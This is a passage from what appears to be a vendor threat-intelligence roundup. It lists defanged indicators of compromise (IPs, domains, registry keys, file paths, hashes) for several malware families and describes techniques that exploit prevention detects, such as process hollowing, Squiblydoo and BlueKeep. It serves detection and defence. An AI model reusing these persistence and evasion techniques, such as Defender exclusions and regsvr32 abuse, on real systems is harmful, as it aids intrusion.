Value Name: C:\Windows\SysWOW64\kdrxwekz
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\dwkqpxds
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\cvjpowcr
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]250 14
43[.]231[.]4[.]7 14
217[.]172[.]179[.]54 14
5[.]9[.]72[.]48 14
130[.]0[.]232[.]208 14
144[.]76[.]108[.]82 14
185[.]253[.]217[.]20 14
45[.]90[.]34[.]87 14
185[.]254[.]190[.]218 14
157[.]240[.]18[.]174 13
176[.]9[.]119[.]47 11
157[.]240[.]2[.]174 10
172[.]217[.]197[.]103 10
172[.]217[.]197[.]147 10
172[.]217[.]197[.]99 10
69[.]31[.]136[.]5 9
104[.]47[.]53[.]36 9
172[.]217[.]197[.]106 8
216[.]239[.]36[.]21 7
64[.]233[.]186[.]26/31 7
142[.]250[.]80[.]4 7
216[.]239[.]32[.]21 6
142[.]250[.]64[.]67 6
172[.]217[.]6[.]195 5
40[.]112[.]72[.]205 5

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 14
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 14
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 14
249[.]5[.]55[.]69[.]in-addr[.]arpa 14
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 14
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 14
microsoft-com[.]mail[.]protection[.]outlook[.]com 14
microsoft[.]com 14
www[.]google[.]com 14
schema[.]org 13
accounts[.]google[.]com 13
drive[.]google[.]com 13
mail[.]google[.]com 13
maps[.]google[.]com 13
news[.]google[.]com 13
play[.]google[.]com 13
www[.]instagram[.]com 13
www[.]youtube[.]com 13
msr[.]pool-pay[.]com 11
z-p42-instagram[.]c10r[.]facebook[.]com 10
api[.]sendspace[.]com 9
www[.]amazon[.]com 6
alt1[.]gmail-smtp-in[.]l[.]google[.]com 5
ip[.]pr-cy[.]hacklix[.]com 4
117[.]151[.]167[.]12[.]in-addr[.]arpa 4

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile 14
%SystemRoot%\SysWOW64\config\systemprofile:.repos 14
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 14
%System32%\config\systemprofile:.repos 14
%TEMP%\<random, matching '[a-z]{8}'>.exe 14
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 13
%TEMP%\kmhngtd.exe 1
%TEMP%\mojpivf.exe 1
%TEMP%\uwrxqdn.exe 1
%System32%\fylqigw\disnhtqs.exe (copy) 1

File Hashes

2e883c663b7f6b68467090ef1a8ba5f7a0eb127b102e0e8b1025c37c8b411431
404a851964da0c2e16041ccf5c37e0950ab0953d64e31fddefafd4f1b48953ba
588e81418300b2fdd043e679a6f541be70964f8b4accee01cc5f1ce881f9767c
5eb9e051502c6cb3e042a064fb0f862af14b7e44ec5996676a76321753cb8d91
670470962e62bd536a96c7362389d497cf5e3b4381dc53b18d5cb52f3c84caf8
7b92cd620aede5695a26078064d6d0fc55469f3c53b485b0b9d607857498639d
7f4255211344827747bc78ef016ad296fc7e270f3d9a80b507947fdc6ceafaff
8ee2261ae281d00208935cae21d355b3cae217e1bc99bbf7dd3cf606f2af59b1
98755afc02c22780f24c9764aadd5cd868c0817624e93ecabda860cf1dc3c749
a6b5147fc2139d1c09b3bf0bf6ddbdb5db6d17c53f1fc9dd85a9c5fc58d3cd0f
ab21f676f8fe95f0be5a3871b0894599fb222ff821ba8b709e6ddcbdab206900
ca2039d9a0908e0f3d1893354d32373fb72d3d93f8d368a01bf84c963476c63f
df958c4e37ff041e9bbe6af82c4f3f5598ccbce6de52226b47564d47e8aff058
f4c85611333664e8bce06dc4dda7b7a9d023d45748ed1758d9dc779567ea2523

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Spyware.Zbot-9827050-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\OLEK 1
<HKCU>\SOFTWARE\MICROSOFT\OLEK
Value Name: Cias
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Tewaaliha
1
MutexesOccurrences
GLOBAL\{<random GUID>} 1
Local\{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
13[.]32[.]204[.]55 1
84[.]22[.]106[.]91 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
lovelypictures[.]org 1
Files and or directories createdOccurrences
%TEMP%\tmpc2d707a9.bat 1
%APPDATA%\Ansyb\dinob.exe 1
%TEMP%\tmp53980b63.bat 1
%APPDATA%\Wycie 1
%APPDATA%\Wycie\oqzy.exe 1
%APPDATA%\Ysocge 1
%APPDATA%\Ysocge\namu.fio 1
%APPDATA%\Zaukho 1
%APPDATA%\Zaukho\odix.obz 1

File Hashes

0480b21f505401bb4bd2a9329a72a036335e3561d1f2531413be9bd20bbcaf20
04eef6493e6a9ad7c6e4126e3a8143f78d9e90aa82710b8cec3d1377008f91f2
07d9cafb62568c5c54a974fa05f07351880c57ab005481d7b63c68c3e3d6de63
08cb1b65a32334ad0637c3fe0eed0b236c6563b0af672c8ce6782bb95f283097
10dfae943443013169b63c2cb97d1a2cda1aca5c16f2aab03fe9f93bd03d770c
13a88e93d2eaeedfd6101519b36a92d2c07288003e202317747624e1c3249d2d
17ce351cb7cbcb583e4c7be548f10091a859cb437bf67e92942185e869ec5978
1b9e87e2a015dbe44a7c86e1a5699236edabcb83cf33451f9f13a044405760ce
1c25c91270edbba91c87015028a764d5dc15abeb8e8f8c1ae9f0b0f39427b037
1d4084a48f6e1c603045370ef53c88ecc91df4ad96e17bb9cb30e8f38853feca
25150b54f62aeb9085092bb86d0a620bf6add982c25da4cb2bef75f54fe55015
2a48b97c3efb2927dbc12c30a61e3e03654e638da86e09192b1f254c9aac2c44
2e6ca78531570533c1f96900981e014a4634b0e36a33b02ded912111ad54090d
2e734059a7e45d04f7bf241226e5247d76aafcaa9bdbbfbf21b2755183aaae51
2f50277a394f62b4b841623fd6d288139ca73ff4c854047886e3203b5eaa2379
351ae0358aafd1a319668a638cc0e0ba705e8e43cd468d58fe735d06182dc49a
35fb76eb082424634ac5b1b894961383cce9b01c8bc06647d8778a4fb0a25a50
391919b5030ac42e35006ffde5dfe55ca15bf15432b817ec85202c8dc82d3205
3b433194c6439a28ea94a7c98ca40f0daccb8e36fb92d21c10f1cdc5427fd8ce
4423e0fca37795a7f48b0ea66a319c8c875920a58f631b739d9613b3127363de
444c7ea779e190144b1791793e1a9818a7c962cbbe86cbf380125a5aaecbfc46
4585a4dadab7275da905b73924f41d7fbb25636d31b89afe7cfa72820df99bbb
45dbeeda31394a18a8076919b9aa89196337cd3976bd9e848ca2cf90438e7e21
48ccf3509da653a28eabbc4843ab7814d1a19afcb9d3bbbd63c1d583dff0c6ec
4c90faefa33d63436153e27fc35caee3275165d947e360e84e7352a8b7ead92c

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Razy-9828691-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT
Value Name: CtrlLogMaxSize
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT
Value Name: CtrlLogMaxSize
11
MutexesOccurrences
Global\468c4b2c-bbb3-46b9-bd95-d5da9e8736d3 11
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
184[.]105[.]192[.]2 11
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
lamerpamer[.]org 11
lornointwonbt[.]org 11
rbnvekrer[.]org 11
rnwnbortobw[.]net 11
tinetrinmmm[.]org 11

File Hashes

071d9c3d6b06c18f8129709c42737cd808ad5bca40a6d7351f6863f115cfd8c1
0ef1d255330ddf89c43e6ecc1d3aeeef6a079fb23ba4ecca2f9dcdf295e72893
29ac4889278f1381557defa9bba5863012ec07a42efd08c4d5a2924488be1779
2b2eb77674a3d844c36d1ecdfbb1dae4051ea090999dac85d69fe4b39d4d6f7a
5ee6f45e2e5f06c0e58831ce7b0b4abfd91e200e95ca037874fad10062fbe879
67ad55519a8cf17eb0bf0e4ba30a14182be19aeb3c6e82e06cea09b08f693a67
912a7db49f81491bb302120c8aaa54ecdb6afa1e36d21d02c60ccf13ddd26722
9c26b6df2104f860336b8dad86560a404f74df2c7a66a24f99695d7eeaee85c4
a2a5679c3ae388c2bee10db5f242708bf3ae03e0a434a1b1564c72b31fc3cfd9
a6a00513d879d25cf7127b9b091f9f9a1adec9e2394cde73e279fdd3e01edbc2
ace0491582dfc689e49f8c6aba3432c8f23d05c344e7604ef08d620a2ac5a420
b9dca0db09189f68f2cd3a50f89cadcd54625d438b4e83699e4119273c92f9ca
e3874eccdbeaa0625efbca0651759a81a4846bb317ac43086cf557ba415f6ac2
f980f43645f6facb8dbb8133e400fc11c19d029a6906296cfa9c2a5bd3b0b563
f9a800de636d22a3cbdbe42f097c0085cebde1b5ba6d38ca32b2e0b5f6d53432

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Ransomware.Ruskill-9827186-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 45 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Qoawam
16
MutexesOccurrences
-c7c8d521Mutex 26
FvLQ49IlïIyLjj6m 26
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
131[.]253[.]33[.]200 12
13[.]107[.]21[.]200 4
13[.]107[.]22[.]200 2
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]bing[.]com 26
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Qoawam.exe 16

File Hashes

01df4ae369661dccfade59d2e3498c8d88dded4bda6b42ba310c38c30a037314
053967bd98d93eb711b67210ba469b94f262172ae10f92fc5d45c1bece28ee48
061612a0b63136df5b725ba0be77646d3581962daee5de1af7cdbdee781d105d
065d25b7577fe097ba6c789428b370eec7967256db2c43cf1cc95ec197805dd1
0e45a2aebdc4a6212f2bb7cb9f84d5597a4c249077c7f6d4152f55931a622be2
1824f91ccbc4431b22f5599747db639a096b1d4f446b3c7cead96f3b4066d6fa
18b1dca10253a42417655885b76dfdbafa9f6f9f5c322b2c809227233c7f0dc9
193ee557ac28a56eb39b7e305c8f82af5b44d5dcbcd63a5bc68764ae64c5b679
19d85f1d25e6808f47798d09a3c612e1f68db90ad33a41b5c0bc4488747418e4
1c4503406deebc20d8575edf1bad548fc627052365af2cdc4d2c2d78f8c91fb6
24447cf4a7cae8a7602d6ab18cbf57a50cd6d7f05413742149806489823e97e0
258c0ea198a5248e11dba69eeee9dbe7904e7065139bcaac747d4209c2b589e2
296d563b7e5041750b6c1f8a4ed8f6711a41d9dbc24bc84d11f7d017691999e1
2eaf24384812f6b8df0b345ee7f11aef2f8a2339e11b3752eb2d3daabf3ba588
3077d499cf1701fe9cda3b797962b96cc604a7edbbd6ce93f6ccfe18ea512933
373ae055a2f7646f60913248957447d01aa19ca9f7c48d1be5434efdee7ecadf
3963634f532439291b94c949ac2b702a4f0216aaae6c38abff24871d96918530
3ad12cacad094bcdb0307246a14bd2d4a8e74109a4bc8a28ffdf04765fd12524
3cdb2401ac9bf018e5077a4e8d52c0a7c7f6a4a1b80018d535483a051870e31c
3d241bc13f8b401bfc9cd9e76a61e306c63be399bee6fb251b91e7d4b472cf1f
40267e2489ce22b75d0dec5d26420a71531577e87276f0217410490f61a4aaee
48d6fcee65464b7b5dd0df802407bf3fd050d291d7d61cba92cb8cd2e206661c
4968881ce2cd887f5677d49cf260d43440f37d822f3294b6a49afed736c038af
49a8d8a4f55bd2686327b32c2378c5ae395992b130552a241622023663ea4228
4dec4954a5c2aa7954c91ee4e715d7dc03c11c09d08ba8933f0946d1971cf167

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Python-9827194-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
162[.]159[.]129[.]233 6
162[.]159[.]135[.]233 4
54[.]225[.]66[.]103 4
54[.]225[.]220[.]115 3
162[.]159[.]133[.]233 2
162[.]159[.]130[.]233 2
23[.]21[.]126[.]66 2
54[.]235[.]189[.]250 2
162[.]159[.]134[.]233 1
54[.]235[.]83[.]248 1
162[.]159[.]136[.]232 1
162[.]159[.]137[.]232 1
54[.]235[.]142[.]93 1
54[.]243[.]164[.]148 1
54[.]221[.]253[.]252 1
54[.]235[.]147[.]252 1
54[.]225[.]242[.]59 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]ipify[.]org 17
discordapp[.]com 13
discord[.]com 2
canary[.]discordapp[.]com 2
Files and or directories createdOccurrences
%APPDATA%\Opera Software\Opera Stable 17
%LOCALAPPDATA%\Google\Chrome\User Data\Default 17
%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default 17
%LOCALAPPDATA%\Yandex\YandexBrowser\User Data\Default 17
%TEMP%\_MEI<pid, matching '[0-9]{1,5}'>\CERTIFI 17
%TEMP%\_MEI17042\_hashlib.pyd 7
%TEMP%\_MEI17042\select.pyd 7
%TEMP%\_MEI17042\unicodedata.pyd 7
%TEMP%\_MEI17042\_socket.pyd 7
%TEMP%\_MEI17042\_ssl.pyd 7
%TEMP%\_MEI17042\VCRUNTIME140.dll 7
%TEMP%\_MEI17042\_bz2.pyd 7
%TEMP%\_MEI17042\_lzma.pyd 7
%TEMP%\_MEI17042\_queue.pyd 7
%TEMP%\_MEI17042\base_library.zip 7
%TEMP%\_MEI17042\pyexpat.pyd 7
%TEMP%\_MEI17042\certifi\cacert.pem 7
%TEMP%\_MEI17042\grabber.exe.manifest 7
%TEMP%\_MEI17042\libcrypto-1_1-x64.dll 7
%TEMP%\_MEI17042\libssl-1_1-x64.dll 7
%TEMP%\_MEI17042\python37.dll 7
%TEMP%\_MEI8202\select.pyd 5
%TEMP%\_MEI8202\unicodedata.pyd 5
%TEMP%\_MEI8202\VCRUNTIME140.dll 5
%TEMP%\_MEI8202\_bz2.pyd 5

*See JSON for more IOCs

File Hashes

0aef6dac17bd51cab73dc81c1324af01c93cef88639486e144eb375982fdedbc
15ef0518ce24192eb65635e51d2a799cc377ccd7f8bbe3b4a754880ffea8db6b
253e96adf953efaf4ad9c1e08cd3a0f6b70cf6e3f4cfd959bf8a5cafc8e44492
276f1222de6935dd18ee96fc13122c1309e835143def3401479f8aa6fb901967
539359ac78d645a537c4b0faa5f947b851342cbfb1267898e842cfdbc60d9cbc
5459f4682054db5fbfce9e1fdc51c0dafc815339dcf789a3e0968e7a9aaccc68
5dcbb25b03756a1fa66bb90c14bee9a588817927040972dc1ecd2a5059c52e1d
689d42f8182bc334ec00f20eff9208ede1441a497ad710e17d9ce81a3f5f2425
6defc8a92376767e4cd80713c134e9190f3e3a7504e8922a08c856832847a4a0
77913aeb24d7b180af0df8cf25c036125a9d7b0f1e4ae2cb7bd356b46d7e015a
7b973e94fa08a21774526c4402931ae9a6e349ab2a4610c623e722f3041f5e2f
7f352d6629ea3ee1bb91149d4d53ea870729f3f2e6aea18c42353b721f2f4a1e
8223db01d392be63e75f9ef42859e149ca70c94c90c04a27ef4445699b1fdcc4
8722939cd4cab4332a8032ecee0d89a70e9128dca5460b58ea8767c9568eb086
884f69f826d3dfc64197d256595a036684447698e9017ce9402dc6e87634e528
b90b0e9214eb6df060bc8857340c56d12104b4b215f3331e4ba532860038dd10
c361892dd847bcca28071d6641fc8c9361f3facc84340c5ecc0041841736d801
c74506861e1203c054e89b2a9ad55b3aa0743ec24ef6da7bf877d38adcbb0b6e
c777d3e771a731760ad226e1becd4c135e24b19c9d30466c7feef4efe0648755
cfc717ae51cff8bd6d9d7e6ff698ec727e502d9a4d6518d6e9e69fa1d96c0681
d34598ae3a06dece7ae6eb70da5517c4e523269e27eac1afed362a2af7a5d322
d69e344b0f9052832f9bd9002752ba0c9d884b27c59c44dedde41317825de750
d7d3b144af1a075d03bec98173c1857e75c6678231451c602cc389848d9cc3f8

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Crystalbit-Apple DLL double hijack detected - (8905)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Process hollowing detected - (8791)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (2004)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (1664)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Dealply adware detected - (602)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Kovter injection detected - (511)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (479)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
CVE-2019-0708 detected - (128)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Gamarue malware detected - (81)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (32)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.